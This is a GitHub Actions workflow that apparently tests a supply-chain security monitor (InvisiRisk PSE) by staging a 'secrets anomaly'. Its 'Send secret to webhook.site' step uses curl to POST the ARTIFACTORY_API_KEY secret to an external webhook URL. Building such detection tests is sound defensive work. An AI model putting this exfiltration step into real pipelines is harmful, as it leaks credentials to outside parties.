name: Secrets stage anomaly

on: 
   push:
     branches:
      - anomaly_secrets

permissions:
  checks: write
  contents: write
  packages: read

jobs:
  python-application-build:
    runs-on: ubuntu-latest
    name: Run build with anomalies
    steps:
      - name: Setup PSE
        uses: invisirisk/pse-action@dev-test
        with:
          api_url: "https://app.stage.invisirisk.com"
          app_token: ${{ secrets.IR_API_KEY_STAGE_SECRETS }}
          
      - uses: actions/checkout@v4

      - name: Use Python
        uses: actions/setup-python@v4
        with:
          python-version: "3.13"

      - name: Send secret to webhook.site
        run: |
          curl -X POST "https://webhook.site/23fc6851-8ac9-444a-8d9b-e82e0a517898?message=${{ secrets.ARTIFACTORY_API_KEY }}" \
          -d "message=${{ secrets.ARTIFACTORY_API_KEY }}"
         
          # curl -X POST -d "message=HI" https://webhook.site/23fc6851-8ac9-444a-8d9b-e82e0a517898
      
      - name: Cleanup PSE
        if: always()
        uses: invisirisk/pse-action@dev-test
        with:
          cleanup: "true"
